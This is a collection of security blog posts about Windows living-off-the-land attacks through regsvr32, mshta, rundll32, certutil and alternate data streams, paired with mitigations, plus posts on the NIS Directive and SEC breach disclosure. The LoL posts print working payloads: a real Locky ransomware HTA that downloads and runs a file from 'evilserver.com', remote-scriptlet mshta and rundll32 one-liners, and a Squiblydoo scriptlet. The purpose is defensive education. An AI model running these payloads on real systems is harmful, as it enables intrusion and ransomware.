All posts by Andy Green

The Malware Hiding in Your Windows System32 Folder: More Rundll32 and LoL S...

The Malware Hiding in Your Windows System32 Folder: More Rundll32 and LoL Security Defense Tips

When we left off last, I showed how it’s possible to run VBScript directly from mshta. I can play a similar trick with another LoL-ware binary, our old friend rundll32. Like mshta, rundll32 has the ability to evade the security protections in AppLocker. In other words, hackers can leverage a signed Windows binary to run handcrafted scriptware directly from a command line even though AppLocker officially prevents it. Evil.

Oddvar Moe, one of this blog’s favorite security bloggers, has studied the LoLs workarounds to AppLocker. In my own experimenting, I was able to confirm that rundll32 can avoid AppLocker’s security defenses.

For example, AppLocker blocked direct execution of a line of JavaScript to pop-up an alert message, but when I fed it the same one-liner directly into rundll32, it ran successfully

AppLocker is not perfect.

I also gave rundll32 slightly more complicated JavaScript that pulls in a remote object and execute it using GetObject. Similar to what I did last time with mashta. It ran flawlessly even though AppLocker disabled scripts.

AppLocker can’t stop rundll32 from running a remote COM object.

As before, I had enabled more granular auditing. I took a peek at the event logs, and thankfully Windows logs the complete command line when the JavaScript is passed directly to rundll32. That’s good news for security defenders.

You can turn on granular logging in Windows to see command line details. Beware: you’re flooded with event details.

Where Is This Going? Lol-Ware Post-Exploitation!

These LoL-ware binaries have incredible abilities to run scripts stealthily. And one would think that pen testers would be working out some post exploitation tools based on this idea. One of the advantage of using scripting languages other than PowerShell is that IT security groups are not necessarily focused on, say, JavaScript.

This was some of the inspiration behind Koadic, which is a command and control (C2) environment, or more familiar to us as a  remote access trojan or RAT. Kodiac allows security testers to open up a reverse shell, dump hashes, pivot using PtH techniques, retrieve files, and run arbitrary commands.

LoL and RAT had a love child, and they called it Koadic. Note the mshta stager.

In the above graphic showing the Koadic environment, you can see that it leverages mshta as a payload launcher to get a foothold on the target computer.

The idea is that the attacker takes the “stager” — the mshta code with the URL — and then embeds it, as we saw, directly in an HTA file or in an Office document’s macros that’s executed when opened.

I’ll be delving more deeply into Koadic in a future post. And I’ll be proving that a corporate IT security group is no match for a capable high-school student. Stay tuned.

Defense Anyone?

AppLocker can’t completely disable script execution. You can resort to simply turning off the Internet spigot by using Windows Firewall. I showed you how to block outbound traffic for a specific binary here.

For a more complete solution, you’ll need to go back to AppLocker, and exclude or blacklist the offending utilities from being executed by “ordinary users”. Something like what I did below, where I prevented users in the “Plain User” group from executing rundll32 while still allowing administrators:

Use AppLocker to exclude ordinary users from being able to run non-ordinary Windows binaries.

The harsh reality is that there really isn’t a fool-proof solution to LoL hackery. There will always be phish mails that allow attackers to get a foothold and then leverage existing Windows binaries.

In this series, we explored regsvr32, mstha, and rundll32. And while the LoL-techniques behind them are well known and defenses available, these binaries are still being successfully used by attackers, as this recent article proves.

And there are the unknown unknowns: new LoL techniques that the security world may not be aware of and are currently being tried.

What do you do?

This brings us back to a familiar theme of the IOS blog: the hackers will get in, and so you need secondary defenses.

This means categorizing your data, finding and putting more restrictive access rights on those data files that contain sensitive information to limit what the hackers can potentially discover, and then using monitoring techniques that alert your security teams when the attackers access these files or exhibit unusual file access or creation activities.

Hold this thought! We’ll see that Koadic, though very clever, is not completely stealthy. It produces some noise, and it’s possible to detect a Kodiac-based attack even when it’s not directly accessing sensitive data.

The Malware Hiding in Your Windows System32 Folder: More Alternate Data Str...

The Malware Hiding in Your Windows System32 Folder: More Alternate Data Streams and Rundll32

Last time, we saw how sneaky hackers can copy malware into the Alternate Data Stream (ADS) associated with a Windows file. I showed how this can be done with the ancient type command. As it turns out, there are a few other Windows utilities that also let you copy into an ADS.

For example, extract, expand, and our old friend certutil are all capable of performing this ADS trick. For a complete list of these secret file-copying binaries, check out Oddvar Moe’s latest gist.

In my testing, I used extract to copy an evil Javascript malware into the ADS of a .doc file.

In the old command shell, dir /r shows you the ADS for each file.

Ready, Set, Launch

This brings up a larger point about Windows utilities: they can perform multiple functions — some of them less well known than others. In fact, the aforementioned utilities listed by Oddvar are all capable of a normal file copy as well as the ADS variant.

This is not a revelation in itself. However, it does means that security monitoring software that’s trying to detect, say, an unusual file copy or transfer can’t just rely on searching the Windows Event logs for a “copy” in the command line. Living-off-the-land (LoL) is all about trickery and making it harder for the defense to understand their IT systems are even under an attack.

This leads to a favorite topic of the IOS blog: security software that doesn’t have visibility into the underlying file systems structures can be easily tricked by hackers. Oh wait, there just happens to be a solution that looks under the file system hood and so won’t be taken in by these LoL techniques.

Let’s get back to the actual execution of the evil malware embedded in the ADS. There are a few ways to accomplish this. You can embed JavaScript, as I did last time, and then execute the ADS using wscript, the Windows-based app that runs scripting engine.

For kicks, I tried cscript, which is the command-line version, and you can gaze on the GIF I created of my hacking session:

You are getting sleepy as you watch this GIF showing JavaScript malware launched from the ADS. Sleepy.

Can you embed an HTA file and launch the malware with mshta? Affirmative.

And PowerShell works fine as well. Oddvar Moe also has a great post enumerating different ways to launch executables from the ADS. Thanks (again) Oddvar!

Back to the Event Logs

I confess to being a little reluctant to turn on more granular event auditing on my Virtual Box environment – it’s already a sluggish thing as it is.

I threw caution to the wind, and enabled the command line auditing setting, which can be found buried in the GPO console under \Computer Configuration\Administrative Templates\System\Audit Process Creation. Now, I’ll be able to see command line arguments for every process that’s launched. And having previously enabled PowerShell command logging, I’ll be faced with an embarrassment of logging riches.

To its credit, Windows logs very detailed information — for example, the ADS I referenced when I launched my aforementioned evil JavaScript:

Got you! With command line auditing, the reference to the JavaScript hidden in the ADS is now visible for all to see in log.

There’s also a log entry displaying the actual PowerShell code (launched by the JavaScript) — in my scenario, it pulls down a remote PowerShell script and then executes it:

Hmmm, a PowerShell session that downloads and executes a remote script. Wonder if it’s connected with JavaScript in the ADS file?

Even with all this extra information in the log, it’s still not necessarily an easy task — there are tools to help, of course — to correlate these two separate events, the cscript and the PowerShell session, and then determine that there’s abnormal activities taking place.

One More Thing: Rundll32 and Command Line JavasScript

If you don’t enable Windows granular command line tracking and PowerShell auditing for performance reasons, then data security monitoring and incident detection becomes almost impossible when faced with  malware-free techniques used by hackers. To add to the security conundrum, hackers have even more tricks up their virtual sleeves to make life difficult for IT security groups.

Some Lol-ware that accepts a local script file or remote URL reference — for example, mshta — also allows raw JavaScript (or VBScript) to be passed into the command line!

I’ve not mentioned rundll32 before, but it’s a LoL binary that has this direct JavaScript capability. The following bit of script using rundll32 does as advertised — launching a PowerShell session that then writes a little “Boo” message. In real world hacking, this message would be replaced with the first step in the attack.

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c write-host BooHaaa!");

Infosec analysts who are searching through raw Windows logs on a server in which granular auditing has been disabled will have a difficult time working out a connection between a rundll32 process event and a subsequent PowerShell event. Unless they’ve read this post!

There’s still more.

Remember scriplets, those bits of JavaScript that can be treated like COM objects?

So … here’s a great one-liner that uses GetObject to pull in a remote scriptlet and then execute it locally. You just need a small bit of JavaScript (or VBScript) to call the GetObject method. Both rundll32 and mshta can accept the script directly. And the mshta version using VBScript to call GetObject is as follows:

mshta vbscript:Close(Execute("GetObject(""script:http://yourserver/thing.sct"")"))

Basta!

I think we’ve covered enough ground in this post. At the end of day, I’m presenting different ways hackers can inflict pain on a beleaguered IT security group. If you’re looking for homework till next time, you can ponder these last two scripts, and study this Stack Overflow article explaining how rundll32 does its magic. We’ll take another look at rundll32, and I’ll chat about some ways to protect against this hacker voodoo.

 

 

 

 

 

 

Continue reading the next post in "Living off the Land With Microsoft"

EU NIS Directive (NISD) Holds Surprises for US Online Companies

EU NIS Directive (NISD) Holds Surprises for US Online Companies

Last month, a major data security law went into effect that will impact businesses both in the EU and the US. No, I’m not talking about the General Data Protection Regulation (GDPR), which we’ve mentioned more than a few times on the IOS blog. While more narrowly focused on EU “critical infrastructure”, the NIS Directive or NISD also has some surprising implications for non-EU companies not remotely in the business of running hydroelectric plants or other critical or essential services.

It’s a Directive!

A key point to keep in mind is that this new law is a directive. We know from the pre-GDPR Data Privacy Directive (or DPD) that, in the language of EU bureaucrats, a directive is an outline or template for a law.  Individual EU countries will have to fill in the details when they “transpose” it into local laws.

NISD merely says the certain companies that perform “essential services” — EU-speak for critical infrastructure — must take “appropriate technical and organizational measures” against cyber attacks and then notify authorities “without undue delay” when there’s a significant security incident.

That is all she wrote!

Because NISD is not in any way prescriptive, there’s a lot of wiggle room for legislators to fill in the details. Yes, this does mean that, like the older DPD privacy law, NISD will vary signficanlty by country – with some national regulators being far stricter with fines and enforcement

A few countries have already implemented NISD — for example, the UK has localized its version – but most are still hammering out the details. As it turns out, the laggards have a little more time to work out their individual laws. NISD says that EU countries really have until November 2018 to identify specific operators of essential services.

That’s right! Unlike the GDPR, the NISD (for the most part) will apply to an explicit set of companies in the essential services sector, which include energy, transportation, health, financial and banking.

As I write this, I am not aware of any EU country that has produced this list. In effect, NISD is on pause until we hear more from local governments on the essential service picks.

US Digital Service Providers Are Under NISD

However, NISD carves out an exception for digital service providers. EU countries do not have to come up with a list of companies that offer essential online infrastructure. According to NISD, any company offering cloud computing, online marketplaces connecting buyers with sellers, or search engine services are automaticall digital providers!

And they would fall under NISD rules right now. (FYI: Micro and small digital providers that have under 50 employees and less than €10 million revenue are excluded.)

US companies in the cloud and online marketplace space — and there are many — will certainly have to up their game for their EU locations.

But there’s another catch.

Remember how the GDPR applies to companies outside the EU even if they don’t have a physical presence there?

Like the GDPR, NISD also has an expanded territorial scope aspect. If a US company has, say, an online marketplace for apartment vacation rentals and promotes that service in the UK or France, then it would fall under NISD. You can read more about the international territorial scope of NISD in this legal article.

Reporting a NISD Cyber Attack

NISD lists a few parameters to help digital service providers decide whether a cyber attack has had a “substantial impact” on its operations. They include the number of subscribers affected, duration, geographical scope, and economic costs.

The fine print from NISD for reporting a cyber incident affecting a digital service provider.

For example, a ransomware, DDoS, or other disruptive cyber-attack impacting a US online service company offering, say, apartment or car sharing, web hosting, or, cough, search engines in the EU market, regardless of whether they have physical EU servers, are covered by NISD. And they would have to report the incident to the local regulator, know in NISD as a Computer Security Incident Response Team or CSIRT.

There will be fines for noncompliance!

As a baseline, the UK’s implementation of NISD has set maximum fines of  €17 million. Mileage can vary, of course, as each EU country is free to set their own fines and penalties.

In any case, US digital providers now have another EU law to take into account. In short, not only do they have to comply with the GDPR’s security and privacy rules for personal data, but also NISD’s more general requirements for securing IT and networking infrastructure against disruption.

 

 

 

 

 

 

The Malware Hiding in Your Windows System32 Folder: Certutil and Alternate ...

The Malware Hiding in Your Windows System32 Folder: Certutil and Alternate Data Streams

We don’t like to think that the core Window binaries on our servers are disguised malware, but it’s not such a strange idea. OS tools such as regsrv32 and mshta (LoL-ware) are the equivalent in the non-virtual world of garden tools and stepladders left near the kitchen window. Sure these tools are useful for work around the yard, but unfortunately they can also be exploited by the bad guys.

For example HTML Application or HTA, which I wrote about last time.  At one point, it was a useful development tool that allowed IT people to leverage HTML and JavaScript or VBScript to create webby apps (without all the browser chrome). That was back in the early ‘aughts.

Microsoft no longer supports HTA, but they left the underlying executable, mshta.exe, lying around on Windows’ virtual lawn – the Windows\System32 folder.

And hackers have only been too eager to take advantage of it. To make the matters worse, on far too many Windows installations, the .hta file extension is still associated with mshta. A phishmail victim who receives an .hta file attachments,  will automatically launch the app if she clicks on it.

Of course, you’ll have to do more than just disassociate the .hta extension to stop all attacks — see, for example, the Windows Firewall mitigation in the previous post. For kicks, I tried directly executing an .hta file using mshta, and you can see the results below:

Still crazy after all these years: mshta .and .hta

It worked fine.

In a hacking scenario where the attacker is already on the victim’s computer, she could download the next phase using say curl, wget, or PowerShell’s DownloadString, and then run the embedded JavaScript with mshta.

But hackers are far too smart to reveal what they’re doing through obvious file transfer commands! The whole point of living off the land using existing Windows binaries is to hide activities.

Certutil and Curl-free Remote Downloading

This leads to certutil, which is yet another Windows binary that serves dual purposes. Its function is to dump, display, and configure certification authority (CA) information. You can read more about it here.

In 2017, Casey Smith, the same infosec researcher who told us about the risks in regsrv32, found a dual use for certutil. Smith noticed that certutil can be used to download a remote file.

It’s a certification tool. No, it’s a stealthy way to download malware. Certutil is both!

This is not completely surprising since certutil has remote capabilities, but it’s clearly not checking the format of the file — effectively turning certutil into LoL-ware version of curl.

As it turns out, hackers were way ahead of the researchers. It was reported that Brazilians have been using certutil for some time.

So if hackers obtain shell access through, say, an SQL injection attack, they can use certutil to download, say, a remote PowerShell script to continue the attack — without triggering any virus or malware scanners searching for obvious hacking tools.

Hiding Executables With Alternate Data Streams (ADS)

Can the attackers get even stealthier? Unfortunately, yes!

The amazingly clever Oddvar Moe has a great post on Alternate Data Streams, and how it can be used to hide malware scripts and executables in a file.

ADS was Microsoft’s answer to supporting compatibility with Apple McIntosh’s file system. In the Mac word, files have a lot of metadata in addition to regular data associated with them. To make it possible to store this metadata in Windows, Microsoft created ADS.

For example, I can do something like this:

Omg , I directed text into a file and the file size didn’t change! Where did it go? It’s in ADS. #stealthy

On a first review, it might look like I’m directing the text of my .hta file into “stuff.txt”.

Take a closer look at the above screenshot, and notice the “:evil.ps1” that’s tacked on. And then shift your focus to the size of “stuff.txt”: it remains at 0 bytes!

What happened to the text I directed into the file? It’s hidden in the ADS part of the Windows file system. It turns out that I can directly run scripts and binaries that are secretly held in the ADS part of the file system.

And One More Thing

We’ll take a deeper dive into ADS next time. The larger point is the high-level of stealthiness one can achieve with the LoL approach to hacking. There are other binaries that serve dual masters, and you can find a complete list of them on github.

For example, there is a class of Windows binaries — for example, esentutil, extrac32, and others — that acts as a file copy tool. In other words, the attackers don’t have to necessarily reveal themselves by using the obvious Windows “copy” command.

So security detection software that’s based on scanning the Windows Event log looking for the usual Windows file commands will miss sneaky LoL-based hacker file activity.

The lesson is that you need, ahem, a security platform that can analyze the raw file system activity to determine what’s really going on. And then notify your security team when it detects unusual access to the underlying files and directories.

Does the Lol-ware approach to hacking scare you, just a little? Our Varonis Data Security Platform can spot what the hackers don’t want you to see. Lean more!

 

 

 

Continue reading the next post in "Living off the Land With Microsoft"

What C-Levels Should Know about Data Security, Part I: SEC Gets Tough With ...

What C-Levels Should Know about Data Security, Part I: SEC Gets Tough With Yahoo Fine

The Securities and Exchange Commission (SEC) warned companies back in 2011 that cyber incidents can be costly (lost revenue, litigation, reputational damage), and therefore may need to be reported to investors. Sure, there’s no specific legal requirements to tell investors about cybersecurity incidents, but public companies are required by the SEC to inform investors in their filings if there’s any news that may impact their investment decisions.

Actual cyber incidents or even potential security weaknesses can be, in legal speak, “material” information that would have to be reported to the SEC immediately in 8-Ks, or in quarterly 10-Qs, and annual 10-K forms. You can read more about what material means in our post on the SEC’s latest guidelines for cyber reporting.

And then along came Yahoo and its massive breach, which occurred way back in 2014, and wasn’t publically reported until 2016. To refresh memories, after more than a two year delay, Yahoo initially said that a mere 1 billion accounts had been stolen, but then later adjusted that number to 3 billion.

This disclosure of this massive breach came out after Verizon had announced its acquisition of Yahoo. This new information ultimately led Verizon to reduce its bid for Yahoo by about $350 million.

If there were ever a test case for the SEC to show that it was serious about enforcing the reporting of material cyber incidents, this would be it.

The SEC Has Spoken

In late April, the SEC announced a settlement with Yahoo, now known as Altaba, in which it agreed to pay a fine of $35 million. I’ve excerpted part of the actual settlement below, because it should be required reading for CSOs, CISOs, CPOs, as well as CFOs and CLOs (but they usually read this kind of thing with their breakfasts):

Despite its knowledge of the 2014 data breach, Yahoo did not disclose the data breach in its public filings for nearly two years. To the contrary, Yahoo’s risk factor disclosures in its annual and quarterly reports from 2014 through 2016 were materially misleading in that they claimed the company only faced the risk of potential future data breaches that might expose the company to loss of its users’ personal information stored in its information systems … without disclosing that a massive data breach had in fact already occurred.

Ouch!

This SEC action comes on top of a seperate $80 million settlement for a class-action suit brought by investors related to the data breach. There are other law suits pending, and you can read about the whole Yahoo legal mess here.

What Should Yahoo Have Done When it Discovered the Breach?

In December 2015, after Yahoo’s CISO learned that highly sensitive information from well over 100 million users had been hacked, including usernames, email addresses, hashed passwords, and telephone numbers, upper management, including the legal team was informed.

The SEC noted that then “senior management and relevant legal staff did not properly assess the scope, business impact, or legal implications of the breach, including how and where the breach should have been disclosed in Yahoo’s public filing …”

And the SEC pointed out that upper management didn’t disclose the breach to Yahoo’s auditors or outside counsel to get their advice.

Yeah, they should have filed an 8-K immediately.

More specifically SEC called out Yahoo for not maintaining “disclosure controls and procedures” for reporting and analyzing and assessing both actual security incidents or potential security weaknesses.

In plain speak, companies are supposed to have agreed upon procedures to get cyber security information to management, and higher management needs to have rules in place to guide them on analyzing and disclosing a breach or potential data security risk.

Let’s Go to the SEC Files

To get a sense of  how a company reports its cybersecurity status when it wants to say there’s nothing unusual going on, I found a plain, garden-variety example after reviewing some 10-K annual reports on the SEC’s site (and gulping down a few coffees):

Boilerplate risk assessment: when infosec is going well, this is what you report.

You usually can find this kind information in the risk section of the report. In short: this company has the usual standard cyber risk profile, and in their case, there is currently no serious cyber incidents impacting them.

Good enough.

Then I looked at Yahoo’s annual report from 2016 when they discussed, what they refer to as, “the security incident” for the first time.

What you say when you have a “security incident”.

Obviously, this information should have been reported much earlier, but note that Yahoo discusses the PII that was exposed along with the extent of the exposure – at least 500 million accounts—and the status of their current investigation.

CFO Learns Programming

In the next post, I’ll provide more details and some advice about what public companies need to be doing to meet the SEC’s data security reporting guidelines. However, it’s clear from reading their latest guidance from earlier this year – and I’m saying that as a blogger, not as a compliance attorney – that C-Levels will be forced to learn basic computer and data security knowledge.

To make the SEC (and investors) happy, public companies should go beyond having breach disclosure procedures in place. At some point, the raw intelligence will need to be examined by well-informed decision makers at the top. As the SEC guidance points out, companies should “evaluate the significance associated with such [cyber] risks and incidents.”

In other words, the CEO, CFO, and the legal team will need to acquire the appropriate technical background to understand what it means when, say, an assessment report says that your customers credit card directory has an “Everyone” ACL, or that a hashed password file was stolen but can be easily cracked.

I’m not saying your CFO should take Computer Science 101 and understand what hashing means — thought it’s not a bad idea! — but the C-suite should have the technical and infosec context so they can make the right evaluation!

More C-suite infosec wisdom next time.

The Malware Hiding in Your Windows System32 Folder: Mshta, HTA, and Ransomw...

The Malware Hiding in Your Windows System32 Folder: Mshta, HTA, and Ransomware

The LoL approach to hacking is a lot like the “travel light” philosophy for tourists. Don’t bring anything to your destination that you can’t find or inexpensively purchase once you’re there. The idea is to live like a native. So hackers don’t have to pack any extra software in their payload baggage to transfer external files: it’s already on the victim’s computer with regsrv32.

As I pointed out last time, there’s the added benefit that regsvr32 allows hackers to stealthily execute JavaScript and VBScript without being detected by AppLocker.

The victim clicks on a phishing email attachment or downloads and opens a file from the hacker’s website, and then a single command line of regsvr32 can run a script (technically, through Windows Script Host), which perform the initial setup of what is typically a multi-step attack. No malware binaries involved since it’s all done “legally” through resident software.

It’s slick, low-profile hacking.

Some Mitigations For Regsvr32 Attacks

In terms of defending against LoL-ware, the major stumbling block is that these leveraged Windows tools also have legitimate uses. You can’t simply eliminate regsrv32.

One approach to reducing the risks of LoL-ware is through whitelisting techniques available through AppLocker. When was the last time you as an ordinary user needed regsrv32? I manage to go through my blogging day without having to register DLLs.

The larger point, of course, is most Lol-ware is meant for sys admins. Back when I was first writing about PowerShell as an attack tool, I described how to use AppLocker to limit who can work with PowerShell. A pure whitelist approach is difficult to pull off, so I just used AppLockers default rules and made some exceptions — only allowing power users access to PowerShell.

I can do something similar with LoL-ware binaries, and you can see the results below when I try to run regsrv32 as ordinary user bob.

Take that hacker! I blocked you with AppLocker.

Another less drastic mitigation is simply to turn off  Internet access for regsrv32. In other words, preventing it from running remote scriptlets living on the hackers’ own servers.

This can be accomplished through Windows Firewall, which I found under the Administrative tools section of my Windows 7 environment. The Firewall console lets you tune network access on an application basis. In my case I turned off outbound access of regsrv32 to both public networks (the Internet) as well internally within the domain. Regsrvr32 still works for normally for dll registration, but I’ve effectively disabled /i option’s secret feature to pull scripts from the Intertoobz.

Did you know that Windows Firewall gives you granular control over individual apps? You do now!

By the way, this seems to be the approach taken by Amazon Web Services, and I suspect other cloud providers as well. When I recently tried the regsvr32 /i hack on an AWS instance, it failed. It took me awhile to realize it was being blocked by the default Firewall rules that seem to now be standard for AWS.

Kudos to Amazon for keeping up with LoL-ware mitigations.

And Along Came HTA

A long time ago, on a distant operating system (XP), Microsoft introduced this idea call HTML Applications or HTA. The idea was to let developers create web applications for Internet Explorer (IE) without “enforcing the strict security model and user interface of the browser.” They even got a patent for it back in 2003.

They discontinued this awesome idea and stopped supporting it in later versions of IE, but the underlying engine that does the real work, mshta.exe, can be still be founder under \Windows\System32.

Of course, during the time when HTA was available, hackers realized they could get IE to launch scripts without the standard browser security checking for, cough, ActiveX objects. And that meant they could obtain shell sessions and run malicious code.

Here’s an old article, circa 2003, describing this technique.

Since current IE browsers no longer support HTA, adaptable hackers found another way to deliver the HTA code to users. They sent it as an email attachment — duh! — with an .hta extension. And tricked the victims to click on the file.

Wait, can that work?

Yes! As I mentioned, the legacy mshta.exe is still there to, presumably, to support old HTA apps that were written by over-eager developers. And on far too many sites, the file type .hta is — agonizing sigh — associated by default with mshta.

All too often, .hta is still associated with mshta. #humans!

In other words, by clicking on a file with an .hta suffix, the victim of a phishing email launches mshta and runs the script embedded in the HTML.

What does the HTA file look like? Here’s a sample script taken from a real-world ransomware attack.

<HTML>
<HEAD>

<script>
try {
a=new ActiveXObject('Wscript.Shell');
a.Run("PowerShell -nop -noe $d=$env:temp+'\\4c2187acf5b34b9e97b6c675b7efba92.ps1';(New-Object System.Net.WebClient).DownloadFile('http://evilserver.com',$d);Start-Process $d;[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');[system.windows.forms.messagebox]::show('Update complete.','Information',[Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information);",0,false);var b=new ActiveXObject('Scripting.FileSystemObject');var p = document.location.href;p = unescape(p.substr(8));if (b.FileExists(p))b.DeleteFile(p);
} catch (e) {}
close();
</script>
</HEAD>
<BODY>

</BODY>
</HTML>

Similar to the COM scriptlets I wrote about, the HTA file acts as a container for a few lines of JavaScript. The goal is to launch a PowerShell session that downloads and directly execute the code containing the next phase of the attack.

Mshta Meets Locky

Unfortunately, many IT groups aren’t aware that native Windows binaries, such as regsrv32, mshta, and more, can be used against them.

A good example of this is a hackers sending phishing emails with attached HTA files and ultimately getting victims to self-install ransomware. The success of Locky ransomware and its variants is actually based on simple and crudely designed social attacks (below).

Yeah, this cleverly written phish mail tricked many people to click on an HTA file and launch a ransomware attack.

Another effective ploy was emailing corporate victims and asking them to download a Chrome browser update from the hacker’s website. In fact, the HTA code above was taken from a file called chrome_patch.hta used in a real-world ransomware attack.

The social engineering in either of these approaches is just clever enough to fool an average employee who hasn’t received any special security training. Or perhaps an executive who’s a little too busy and susceptible to clicking on a phish mail attachment referring to, say, a FedEx invoice

For kicks, I took some of the HTA above, tweaked it so it would download my PowerShell “boo” message, and then used a JavaScript obfuscator to make it even stealthier and less likely to be detected by malware scanners. I also added a .pdf suffix before the .hta, to trick the unwary user:

Obfuscated JavScript embedded in HMTL via way of HTA. #sneaky

When I clicked on the HTA file, I was presented with a security dialog —  thank you, Microsoft for this tip-off — asking whether I wanted to “run” what is supposed to be a document.

What happens when you click on an HTA file? You get a warning from Microsoft, but many people clicked on “Run” anyway.

All too many users became victims of Locky since they went ahead  and clicked on what was a security warning. Humans like to click!

Mshta Mitigations

Ransomware attacks in the last two years that were based on HTA could have been easily stopped with a few simple configurations. As we saw above for regsrv32, closing internet connectivity for mshta through the Windows Firewall or blocking it for average users using AppLocker are both good defensive measures.

Even simpler is to change the .hta file type association from mshta to something more benign – like launching notepad!  By the way, that’s a very common approach, and the user should have some questions when she sees the file is not an invoice. At least, we hope so.

In the next post, we’ll look at a few more binaries that allow you to run scripts. And then we’ll review other LoL-ware that lets you mask common file activities.

I hope you’re seeing that the main point of LoL hackcraft is to make it appear to observers in the IT security room that the hacker is just another user running standard Windows utilities. And also that to reduce the damage of these attacks, you’ll need better secondary defenses!

Continue reading the next post in "Living off the Land With Microsoft"

The Malware Hiding in Your Windows System32 Folder: Intro to Regsvr32

The Malware Hiding in Your Windows System32 Folder: Intro to Regsvr32

In our epic series on Malware-Free Hacking, I wrote about techniques that let you use well-known Microsoft apps and tools to run evil custom scripts. This file-less hack-craft usually involves sneaking obfuscated VBA into Office documents. But there’s more file-less evil out there.

For this new mini-series, I want to dive into something call LoL, for Living off the Land, in which hackers reuse less well-known Windows utilities to hide script payloads and cloak other activities. This github page contains a nice collection of all the different binaries and scripts — with sample attack code — that falls under the LoL genre (h/t Oddvar Moe).

The more important point with LoL is it’s underlying philosophy: you hide your attack by using Windows software in ways that weren’t intended by the developers. Not only does this approach get past conventional malware scanning, but there are other benefits.

As we’ll soon see with regsvr32, which allows for JScript or VBScript to be injected into DLLs, LoL attacks can also evade Microsoft’s AppLocker and avoid easy spotting in the event logs.

Yeah, LOL techniques allow malware to blend into the scenery and make it difficult to spot in the wild.

Regsvr32 and Squiblydoo

From what I can decipher, one of the founding fathers behind using regsvr32 as a post-exploitation LoL tool is security researcher Casey Smith.

But first, do you know what regsvr32 even does? Answer: It registers DLLs into the Windows Registry, allowing other software to access the library as needed. Seems harmless.

In 2016, Casey discovered that regsvr32’s /i parameter, which is used to trigger any initial installation processing, accepts a COM scriptlet. In other the words, an administrator can insert dynamic code when the DLL sets itself up.

Remember scriptlets? I discussed them in my malware-free series. They are simply JScript or VBScript code embedded in XML, allowing them to be passed around as COM objects (below).

<?XML version="1.0"?>
  <scriptlet>
  <registration         
  progid="Pentest"       
  classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
  <script language="JScript">
      ![CDATA[        
       var r = new ActiveXObject("WScript.Shell").Run("powershell -noe -nop -c write-host Boo!"); 
  ]]>
  </script>
  </registration>
  </scriptlet>

 

By using regsvr32 with /i, Casey showed he could run scripts in a directory that was locked down by AppLocker. AppLocker is the Windows security technology that I experimented with in my legendary PowerShell obfuscation series. Well, I was impressed with it at the time.

His clever proof of concept made some news in 2016. Ultimately his technique, known as Squiblydoo, found its way into real-world malware used by known APT groups — for example, in this spear fishing campaign against Russian businesses last summer, and more recently in some cryptomining craziness.

This is a serious security threat, and leveraging regsvr32 this way makes it far easier for hackers to go about their work undetected.

Microsoft did respond, in Windows 10 at least, with a way to detect  (not block) Squiblydoo – which it calls process hollowing — through an update to its Windows Defender ATP. (Yours truly has a trial copy of ATP, which is on my long list of things to test.)

The Microsoft band-aid helps a little. In the next post, I’ll present a few sensible mitigations to greatly lower security risks.

A Closer Look at Regsvr32

To preserve my AWS computing budget – thanks Sarah for paying the bills! – I decided to test Squiblydoo on my desktop Virtual Box environment. If you want to play along at home, you can download a free Windows 7 VM from Microsoft here.

I went into AppLocker, which can be found under the Local Security Policies console within Administrative Tools. You’re essentially working with a GPO editor that zooms into Security Setting. You’ll find AppLocker under Application Control Policies.

I simply disabled script rules (below) in the home directory of an ordinary user. This tells AppLocker not to run JavaScript, VBScript or PowerShell. The great thing about AppLocker over the older Software Restriction Policies is its selectivity: you can disable a specific user – bob, in my case – and administrators could still run scripts in that directory or anywhere else.

Pro tip: AppLocker depends on Application Identity service running. You may have to start this service depending on how the Applocker GPO entries were configured. In my case, I had to take a quick visit to the Services console, found under Administrative Tools, to start  the Application Identity service manually.

I then deposited a JScript  file (with a .js suffix), containing just the bit of ActiveX code in the above scriptlet into bob’s Documents directory. And then tried to start it — mimicking one phase of an attack.

AppLocker blocked it as expected.

Saved by AppLocker: it prevents a JS file from being run.

And then I tried the same thing with regsrv32 using the Squiblydoo technique to run a COM scriptlet as part of a dll initialization.

This time AppLocker failed to prevent the code from being executed.

Game, set, and match for Casey.

But if you encase the JScript in XML to make in a COM scriptlet, AppLocker fails.

And one more thing.

Squiblydoo also works if you enter a url after the /i parameter. In other words, you can go completely fileless and pull and execute the scriptlet from a remote site.

regsvr32 accepts a URL as well. #sneaky

This brings up an important about how Squiblydoo is leveraged in real-world malware attacks. They are typically a multi-step sequence in which regsvr32 might be used initially with a url, and then later on in the attack (after more files are generated), this stealthy utility can also run a scriptlet directly from a directory.

Let’s Go to the Event Viewer

As other security expert have pointed out, squiblydoo avoids giving away too many details in the Windows Event Viewer. That’s kind of true as I discovered.

For my own testing, I turned on process creation auditing, which can be found under the aforementioned Local Security Policies. My Windows 7 environment in VirtualBox logs every process creation event, which is event id 4688 if you’re following at home.

I enabled logging of all process creation events for my Windows 7 VM environment.

I also turned on PowerShell logging. Remember that? Microsoft had to up its security game after it became clear that PS was being exploited by hackers, so it added more granular PS auditing capabilities. I enabled Module and Script Block logging in the PowerShell section of the GPO. console. It’s the same settings I used in my initial PowerShell testing, which you can read more about here.

Here’s what I learned.

If you run a JS script file, the Event Viewer tells you that the wscript engine was engaged. That’s underlying software environment used by Windows to run scripts. And then a little bit later in the log, you can see the details of a PowerShell session being started along with the command line that was passed in.

You could, perhaps, piece all this together, with a little help from some event correlation tools: “Oh, a JScript file was clicked and then an ActiveX object launched a PowerShell session.”

Under squiblydoo, this bit of evidence of a script being run is not available. #sneakier

But when I used the Squiblydoo technique, I only saw the regsvr32 command (without the command line) in the event log. And then later, the PowerShell events show up. If you look more closely in the Application Logs section of the Event Viewer, under Windows PowerShell, you’ll see the actual command line used (because we enable more detailed PS logging through GPO.)

I strongly suspect even good correlation software on the market would not be able to connect regsvr32 and a PowerShell sessions. And in a quick scan of the raw logs, a harried sys admin who’s not up on the latest hack-craft could easily miss these clues.

Real-World RegSvr32

This brings up one last point as I mercifully close out this first post. Hackers are in the business of making it incredibly inconvenient for security pros to do their work.

Besides the PS obfuscations techniques I’ve written about, the entire attack sequence is normally broken into many different parts with some of the actions specifically designed to throw off security monitoring tools.

In other words, instead of the attack involving a single download  — the old way — it’s now spread out over several steps, with LoL Windows utilities, such as regsvr32, hiding the actual code pulls from the hacker’s site.

